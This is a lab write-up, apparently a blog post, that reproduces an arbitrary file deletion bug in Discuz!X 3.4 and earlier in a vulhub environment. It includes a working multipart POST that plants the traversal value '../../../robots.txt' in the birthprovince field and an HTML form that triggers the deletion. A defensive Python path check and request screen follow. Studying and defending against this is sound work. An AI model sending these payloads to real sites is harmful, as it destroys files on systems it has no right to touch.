Discuz!X ≤3.4 Arbitrary File Deletion Vulnerability
1. Affected versions
Discuz!X ≤3.4
2. Impact
Arbitrary file deletion
3. Vulnerability PoC
cd /root/vulhub/discuz/x3.4-arbitrary-file-deletion //enter the directory of the vulnerability being reproduced
docker-compose up -d //bring up the environment with docker-compose

During installation, only the database host needs to be changed to db; everything else can stay at the defaults.

Visit http://your-ip/robots.txt to confirm that robots.txt exists:

Open the personal settings page, press CTRL+F in the page source and search for formhash. The page is:
http://192.168.11.147/home.php?mod=spacecp&ac=profile&op=base

With your cookie and formhash filled in, send the following request:
POST /home.php?mod=spacecp&ac=profile&op=base HTTP/1.1
Host: localhost
Content-Length: 367
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryPFvXyxL45f34L12s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: [your cookie]
Connection: close
------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="formhash"
[your formhash]
------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="birthprovince"
../../../robots.txt
------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="profilesubmit"
1
------WebKitFormBoundaryPFvXyxL45f34L12s--

Create upload.html locally with the following HTML:
<body>
<form action="http://[your-ip]/home.php?mod=spacecp&ac=profile&op=base&profilesubmit=1&formhash=[your-formhash]" method="post" enctype="multipart/form-data">
<input type="file" name="birthprovince" />
<input type="submit" value="upload" />
</form>
</body>

Upload any ordinary image.

robots.txt has now been deleted.

4. Review
Root cause
The core problem is in upload/source/include/spacecp/spacecp_profile.php: the value submitted in the birthprovince field is stored as-is and later used to build the path of a profile attachment that gets deleted, so a traversal value such as ../../../robots.txt removes an arbitrary file relative to the attachment directory.
Reference: LoRexxar
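The two checks a defender would want here, written as an added Python example that is not Discuz code: a containment check that refuses any stored profile value resolving outside the attachment directory, and a screen over a multipart body (for example from a proxy or WAF log) that flags a birthprovince value shaped like a path. The attachment directory and the sample body are constructed for the example; the body mirrors the request shown above.

```python
import os
import re

# Constructed sample directory standing in for Discuz's attachment/profile
# directory (an assumption; the real value comes from the site's settings).
ATTACH_DIR = "/opt/discuz-example/data/attachment/profile"


def safe_profile_attachment_path(attach_dir, stored_value):
    """Resolve a stored profile-field value to a file path and return it only
    if it stays inside attach_dir; return None for anything that escapes.
    A value such as '../../../robots.txt' or '/etc/passwd' fails this check."""
    if not stored_value or "\x00" in stored_value:
        return None
    base = os.path.realpath(attach_dir)
    candidate = os.path.realpath(os.path.join(base, stored_value))
    if candidate == base or os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


# Matches a form-data part's field name and the first line of its value.
FIELD_RE = re.compile(r'name="(?P<name>[^"]+)"\r?\n\r?\n(?P<value>[^\r\n]*)')


def suspicious_profile_fields(multipart_body, watched=("birthprovince",)):
    """Screen a multipart/form-data body and return {field: value} for watched
    fields whose value looks like a filesystem path ('..' or a leading slash)
    rather than a plain profile setting."""
    hits = {}
    for m in FIELD_RE.finditer(multipart_body):
        name, value = m.group("name"), m.group("value").strip()
        if name in watched and re.search(r"\.\.|^[\\/]", value):
            hits[name] = value
    return hits


# Constructed body mirroring the page's request (only the three form fields).
SAMPLE_BODY = (
    "------WebKitFormBoundaryPFvXyxL45f34L12s\r\n"
    'Content-Disposition: form-data; name="formhash"\r\n\r\n'
    "[your formhash]\r\n"
    "------WebKitFormBoundaryPFvXyxL45f34L12s\r\n"
    'Content-Disposition: form-data; name="birthprovince"\r\n\r\n'
    "../../../robots.txt\r\n"
    "------WebKitFormBoundaryPFvXyxL45f34L12s\r\n"
    'Content-Disposition: form-data; name="profilesubmit"\r\n\r\n'
    "1\r\n"
    "------WebKitFormBoundaryPFvXyxL45f34L12s--\r\n"
)
```

Running suspicious_profile_fields(SAMPLE_BODY) flags the birthprovince field, and safe_profile_attachment_path(ATTACH_DIR, "../../../robots.txt") returns None, so the unlink never happens.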
Summary
1. A friend pointed out errors in my earlier Aria2 article, so today I redid it and improved the specific steps. (Guidance from experienced readers is welcome; contact email: xu515727574@163.com)
2. I have recently been learning Python: practice, and progress.
3. Goal: follow the experts, learn from the experts, and walk alongside them.